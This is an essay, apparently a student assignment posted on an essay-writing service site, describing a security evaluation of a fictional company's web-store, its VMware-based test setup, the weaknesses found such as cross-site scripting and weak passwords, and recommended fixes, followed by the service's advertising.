Widgets Inc requested for a performance security evaluation for the web-store. The security evaluation is to be done by Benny Vandergast Inc. The security evaluation is meant to reveal the flaws in the security measures implemented in the web-store. The main objective of security testing is to find how vulnerable a system is. The system security evaluation is used to determine how secure the resources and the data are protected. The security evaluation is used to test if un-authenticated users can access the web-store and steal data in the system or violate the system process. If a company uses web-store, most transactions are done online and the data has to be secure. Online transaction will be many and the transactions have to be accurate and the data should be secure. Security evaluation ensures that the system is efficient and effective. The attributes of security testing include: availability of the system, authorization, confidentiality, integrity, resilience, authentication and non-repudiation.
Security testing for a web-store application is very important. System testing is done to avoid cases such as: loss of customer trust, costs of dealing with application attacks in the future, the web-store downtime, time loss and the expenditure of recovering from down time.
There are various classes of threat to a web-store. The classes include: privilege evaluation, SQL injection, URL manipulation, and unauthorized data access, denial of service, identity spoofing and cross-site spoofing (Getting, 2018). The privilege evaluation involves a hacker who has an account in the system and the hacker tends to increase his/her privileges to a supper user. The hacker is then able to run the code of the system and could compromise the entire web-store application. SQL injection involves an attack technique by the hackers. The hackers tend to insert a malicious SQL in the field of execution that can result to the system providing critical information from the database. The hacker could use the information to vandalize the whole system. The attack takes advantage of the present loopholes of the system. Unauthorized data access is another major attack in the systems (Kauffman and Tallon, 2014). There are various types of unauthorized access. They include: unauthorized access to data by data-fetching operations or use of other systems to access data and unauthorized access to the network, which includes the servers and servers. URL manipulation involves manipulation of the website URL query strings.
Denial of service involves exemption of the legitimate users of the system from accessing the system resources. The attack could render the entire system unusable. Data manipulation involves a hacker changing the data of a website to have some advantages. The hackers tend to change the HTML pages to be offensive. Identity spoofing involves the hackers acquiring the credentials of a legitimate user. The hacker then attacks the network hosts or can even steal data. Finally, cross-site scripting is a common threat to the web-store sites. The hacker tend to inject client-side script in to the system. The users of the system could click on the links. Some of these links could allow the hacker to steal some information from the system. The hacker could also perform some wrong actions pretending to be the legitimate user.
Benny Vandergast Inc. provided a VMware machine that was used in the testing process. Virtualization technology has advanced from only hardware virtualization to data virtualization, network virtualization, storage virtualization and memory virtualization. Each scope of virtualization has its own specification. Virtualization testing is very useful and advantageous in testing of software such as the web store for WidgetsInc.
There are a number of that were used in the investigation of the system security. The methods involved in testing the system include: cross-site scripting, ethical hacking, password cracking, penetration testing, risk assessment, security auditing, security scanning, SQL injection, URL manipulation, posture assessment and buffer overflow testing (Singh, 2016).
The testing process involved four techniques. The practices include: tracking down issues that would be recreated, solving resource collision during testing, getting control when the matrices involved in testing become hard to manage and to use smart VMware monitoring (Diez et al., 2016). First, there were issues that had to be tracked. This were the issues that would not be recreated again. There were bugs that would cause the system to crash and could not be reproduced. With such bugs, the testers would not get information on what led to the crashing of the system. To optimize testing on such issues some tools used to record or replay the processes are necessary. For the scenario, VMware Snapshots was used (eCommerce, 2013). The VMware Snapshots allowed the testers go back to the entire execution that led to the crash. With the VMware Snapshots also allowed the tested view the threads and processes to see what lead to the crashes that were experienced with the system. The recorded activities were saved in a file for easy retrieval if needed.
The second practice that was implemented, was solving resource collision during the testing process. Some tests would not be implemented concurrently due to the challenges of acquiring the resources. The testing for such environments was successful by use of cloning and network fencing. Testing was possible in many environments at the same time. For example, it was possible to test for user authentication, test for regression, test for integration at the same time.
The third practice that was involved was, to manage the situation even when the test matrix was becoming hard to manage. There were situations whereby, the testing crew would encounter tough trade-offs in the test matrix and the quality of software that is going to be released. To solve the situation, the testing crew created templates that were using to establish the level of testing. For example, at the testing crew had Level One as website testing, Level two as operating system, Level Four as database testing and Level Five was the network. There were various tests at each level.
Finally, the group had to deploy a smart VMware monitoring system. After the implementation of a new software, there is need to keep an eye on the environment. Opvizor is the right tool for monitoring the VM ware environment (opvizor, 2018). The tool does not require one to keep watching the result. The tools sends notification once it detects a problem in the system. Also Snapwatcher was used to capture the snapshots and stay on the VMware environment. The Snapwatcher is useful in monitoring the behavior of a system.
The virtualized testing needed to be efficient and automated. Virtualization provide better utilization. The testing crew can revert the system to the previous state. This means cleanup is easy and the team could easily debug the problems using the snapshots generated. Virtualized testing involves minimal loss in the server crashes. VMs are basically file which can be backup up for retrieval in case of any loss. VMs provides a pool of resources. This means that there is no need to reconfigure the images in case of a new physical server. The team created a pool of resources. This minimizes the cost required for testing. The VMs testing is easy to maintain and the processes automated. This means that there was minimal effort required from the group that was assigned the testing activity of the e-commerce system. The VMs could also be replicated through virtualization and the already available automation scripts.
Benny Vandergast Inc needed the virtualization infrastructure to install VMware ESXi Hypervisor. The ESXi provides the tools to run and manage virtual machines. Then, the group needed to create a virtualized testing environment. The testing environment was set in an empty VM. The group installed the Guess operating system and the applications required in testing the web-store system. The VM was cloned to create the VM many times during the testing process. Windows Server 2008 and JBoss Application Server 6 were installed on the Virtual Machine (Mastering Vmware Vsphere 4, 2011). That was the manually configured server. The server needed to be automated. Therefore, the tool that was used is called VMware vSphere PowerCLI. The tool is closely developed with the VMware infrastructure called vSphere . PowerCLI has many useful features, but only a few were utilized in creating the testing environment (Dekens, 2016).
PowerCLI uses the Microsoft Power Shell platform. Microsoft Power Shell is a powerful tool but user-friendly, as it provides the console commands. The console commands are quite useful in Windows products such as IIS, SQL server, MS Office and many more. PowerCLI was connected to the VMware EXSi Server. The necessary tools were installed in the VM, as it improves the VM performance and makes some challenging operations simpler. The network interface cards of the operating system were installed on the virtual machine configuration. A dedicated IP was set for the test infrastructure. The VM’s IP was updated. A snapshot was created after the process of configuring the network. The snapshot would be useful in case there was need of reverting the VM to the previous state. The snapshot was also created in case of future use.
Next, an environment was created for the configuration files. Some data about the environment is useful. NIC objects were used in the creation of the configure files for the purpose of future tests. The $nic variable continues the IP, DNS and sub-net mask information. The hash-table “$env” was used for executing the tests. There was need to set up the tests and the test frameworks.
The web-store software need to be installed. This was the software to be tested. The sources were synced with the test and the frameworks (Ixiacom.com, 2018). Some report templates were prepared. The Microsoft products were managed via the PowerShell API. A number of executable files, compressed files with the script were copied to the Virtual Machine. The tests were then synced from the source control repository (Softwaretestinghelp.com, 2018).
Once the scripts were executed they return the results to the screen while working in the Virtual Machine. One can monitor the progress of a long test. The invoke VMScript is used to execute many scripts. Another snapshot was taken at this level, for use in case revert is necessary (Halal, 2008).
After the execution was complete a report is created. The report holds information about the test reference, test status, log files and the number of execution that took place for a specific task. The report can be set to be sent to various people. In case of another test, a clean-up of the environment is done and a reverted to the snapshot that was taken at the beginning. With this process, then multiple tests can be done as the errors are found until all the errors are fixed.
The web-store was found to have some faults. The faults include unwanted script or scripts that are not trusted. By the use of Cross-site scripting was performed in the web store. A script was tried to be added in the application (Offutt, 2008). If the system accepted any of the scripts, then the system is prone is to attack. With the web-store application the script was accepted. This depicted the system is not secure and is prone to attack and manipulation. Attackers tend to use script to run malious processes on the browser (Smartbear.com, 2018). This attacks tend to use scripts to expose the credentials of various users in the system.
The scripts can easily be detected using PowerShell. One can change the execution policy of such scrips by changing the execution policy. Also, some password of various people were easy to be guessed. The user account with easy to password can be easily used by hacker to have access into the system and manipulate some changes in the database and the system processes. The users with the account were advised to change the passwords and develop strong password. Also, the system administrator was urged to only allow user with strong passwords. The software to be used in creating password is password generator. Also, the system does not prohibit multiple logins. The other fault in the authentication bit, in the time of inactive the session ID do not expire. The session ID could be stolen or can be predicted by a hacker. The hacker can take over a genuine user’s online identity and misuse that (Nahari and Krutz, 2013).
The server in which the site is hosted, lacks the backup plugins. Backup for every data is every essential. The company should incorporate backup devices from backing up of data in case of a system failure. In case there is a vandalism to the servers and the server have no backup, there are high chances of losing much data. The website store was also prone to the price manipulation (Pandey and Rastogi, 2010). This is accessed by the hackers through the payment gateways. Most cases, some hackers may use software such as Achilles to change the amount that is payable. The changes could be made as the following image shows. An intruder can lower the price and get away with the data without recognition. Finally, the server in which the web-store is installed does not have an antivirus. The system is prone to attack by malicious software that the hackers could insert in the web pages once the hackers gain access to the site. The malware could also be found on the workstations in the office. There are difference ways in which malware is installed on the site. Malware could be installed into the site via cross-site contamination or widespread malware infection. The malware infection can lead to introduction of botnets in the system and DDoS attack. Stealing of the credit card information for the clients. Malware can also be used to spam.
Apart of the issue listed above the system will be okay once okay. The configuration set up of the e-commerce site was set are required (Schiff, 2018). There are a number of ways to enhance the security of the web-store. The security measures include: having digital certificates, encryption of date in transit, installing antivirus, performing a security audit on the system regularly many other factors (TechGenYZ, 2018).
First, the scripts that are in the site that are not trusted. The script can be identified and the removed from the system. Also, include the white-list input validation. The web application on the computers and the servers should up-to –date. Mostly, the outdated applications tend to be more vulnerable to the cross siting scripts. Maintaining the updated version of web –application or the software is very necessary (Symantec.com, 2018).
Secondly, the aspect of authentication insecurity could cause much havoc into the system (business.com, 2018). As the credentials could be stolen or compromised. The best way to solve this problem in the system is to use the Two Factor authentication method. This involves the addition of an extra lay of security in the e-commerce sites. The two factor authentication involves using two means of identification (Uky.edu, 2018). First a user is required to enter the log in credentials. Secondly, is the use of a generated in real time message sent to the phones or send to email. The hackers may succeed in the first step but not in the second method of authentication (Vranken and Poll, 2015).
Thirdly, the company need to educate the users on the importance of using strong passwords. The employees to be trained on the importance of not sharing their login credentials to others. The employees should be informed not to email or test email any sensitive data. The system could be hacked. The hackers and the hackers may end up having sensitive data or the customer personal information.
The company is required to install antivirus software in various workstation and the server. The antivirus will help in preventing the malware from getting in the network system. Finally, the company should have a monitoring system that keeps track of all activities on the site and then send notification to the administrator in case a system intrusion is detected. Tools such as Woopra and Clicky allow easy monitoring of the visitors who are navigating across the website in real-time. When the steps will be implemented then the e-commerce site will be secure of any threat.
Conclusion
The virtualization method of testing a system is easy and efficient. The testing is scalable and agile as one can create more Virtual Machines that are used to run the tests. There are also minimal chance of losing data. This is successful with the help of snapshots can be reverted to get the previous data. The VMs can also be reverted to clean data without losing any configuration. With the VM testing there is no fear of hardware failure. VM actually behave like the hardware only that they involve sharing of resources. The VM can be cloned into multiple VMs. The automated nature of VMware testing makes use of high-testing rated tools to give accurate reports.
The security evaluation on the system was performed successfully (Performance Testing: A Comparative Study and Analysis of Web Service Testing Tools, 2018). The security gaps that were found in the system should be looked into and the necessary measures takes to reduce the risks in the business. Once a business has implemented the proposed ways to enhances system security, the company is assured of enhancing trust with the customer (Chen et al., 2008). More customers will buy goods and services from WidgetsInc and the profit margin will increase. A secure system will have accurate and reliable data. The accurate data will be used in the decision making of the company.
References
Schiff, J. (2018). 15 Ways to Protect Your Ecommerce Site From Hacking and Fraud. [online] CIO. Available at: https://www.cio.com/article/2384809/e-commerce/15-ways-to-protect-your-ecommerce-site-from-hacking-and-fraud.html [Accessed 22 May 2018].
business.com. (2018). E-commerce Security: Protect Your Store – business.com. [online] Available at: https://www.business.com/articles/e-commerce-website-security-5-best-practices-to-protect-your-online-store/ [Accessed 22 May 2018].
opvizor. (2018). 4 Best Practices for Software Testing With VMware. [online] Available at: https://www.opvizor.com/4-best-practices-for-software-testing-with-vmware/ [Accessed 22 May 2018].
Softwaretestinghelp.com. (2018). How to Install and Use VMWare Virtual Machine in Software Testing — Software Testing Help. [online] Available at: https://www.softwaretestinghelp.com/how-to-install-and-use-vmware-virtual-machine-in-software-testing/ [Accessed 22 May 2018].
Symantec.com. (2018). Common Security Vulnerabilities in e-commerce Systems | Symantec Connect. [online] Available at: https://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems [Accessed 22 May 2018].
TechGenYZ. (2018). What is e-commerce and what are the major threats to e-commerce security?. [online] Available at: https://www.techgenyz.com/2017/04/05/e-commerce-major-threats-e-commerce-security/ [Accessed 22 May 2018].
Getting, B. (2018). Protect Data From Cross-Site Scripting (XSS) Attacks | Practical Ecommerce. [online] Practical Ecommerce. Available at: https://www.practicalecommerce.com/Protect-Data-From-Cross-Site-Scripting-XSS-Attacks [Accessed 22 May 2018].
Pubs.vmware.com. (2018). VMware vSphere 5.1. [online] Available at: https://pubs.vmware.com/vsphere-51/index.jsp?topic=%2Fcom.vmware.powercli.cmdletref.doc%2FGet-ErrorReport.html [Accessed 22 May 2018].
eCommerce. (2013). Controlling, 25(6), pp.311-311.
Offutt, J. (2008). Editorial: Software testing is an elephant. Software Testing, Verification and Reliability, 18(4), pp.191-192.
Dekens, L. (2016). VMware vSphere powerCLI reference. Indianapolis: Sybex, a Wiley brand.
Mastering Vmware Vsphere 4. (2011). Sybex Inc.
Vranken, H. and Poll, E. (2015). Software security. Heerlen: Open Universiteit.
Smartbear.com. (2018). What is Service Virtualization? | SmartBear. [online] Available at: https://smartbear.com/learn/software-testing/what-is-service-virtualization/ [Accessed 22 May 2018].
Ixiacom.com. (2018). The Ixia Difference in Virtualization Testing | Ixia. [online] Available at: https://www.ixiacom.com/resources/ixia-difference-virtualization-testing [Accessed 22 May 2018].
Uky.edu. (2018). E-commerce securities. [online] Available at: https://www.uky.edu/~dsianita/390/390wk4.html [Accessed 22 May 2018].
Kauffman, R. and Tallon, P. (2014). Economics, Information Systems, and Electronic Commerce. Hoboken: Taylor and Francis.
Nahari, H. and Krutz, R. (2013). Web commerce security. Hoboken, N.J.: Wiley.
Halal, W. (2008). Technology’s promise. Houndmills, Basingstoke, Hampshire [England]: Palgrave Macmillan.
Singh, N. (2016). A Survey of Threats to E-Commerce Applications. Research Journal of Science and Technology, 8(3), p.145.
Pandey, D. and Rastogi, A. (2010). A Critical Research on threats and security technology related to Payment System on E-commerce Network. International Journal of Computer Applications, 8(3), pp.11-14.
Chen, J., Schmidt, M., Phan, D. and Arnett, K. (2008). E-commerce security threats: awareness, trust and practice. International Journal of Information Systems and Change Management, 3(1), p.16.
Diez, H., Segura, Á., García-Alonso, A. and Oyarzun, D. (2016). 3D model management for e-commerce. Multimedia Tools and Applications, 76(20), pp.21011-21031.
Performance Testing: A Comparative Study and Analysis of Web Service Testing Tools. (2018). International Journal of Recent Trends in Engineering and Research, 4(3), pp.95-100.
Essay Writing Service Features
Our Experience
No matter how complex your assignment is, we can find the right professional for your specific task. Contact Essay is an essay writing company that hires only the smartest minds to help you with your projects. Our expertise allows us to provide students with high-quality academic writing, editing & proofreading services.
Free Features
Free revision policy
$10Free bibliography & reference
$8Free title page
$8Free formatting
$8How Our Essay Writing Service Works
First, you will need to complete an order form. It's not difficult but, in case there is anything you find not to be clear, you may always call us so that we can guide you through it. On the order form, you will need to include some basic information concerning your order: subject, topic, number of pages, etc. We also encourage our clients to upload any relevant information or sources that will help.
Complete the order form
Once we have all the information and instructions that we need, we select the most suitable writer for your assignment. While everything seems to be clear, the writer, who has complete knowledge of the subject, may need clarification from you. It is at that point that you would receive a call or email from us.
Writer’s assignment
As soon as the writer has finished, it will be delivered both to the website and to your email address so that you will not miss it. If your deadline is close at hand, we will place a call to you to make sure that you receive the paper on time.
Completing the order and download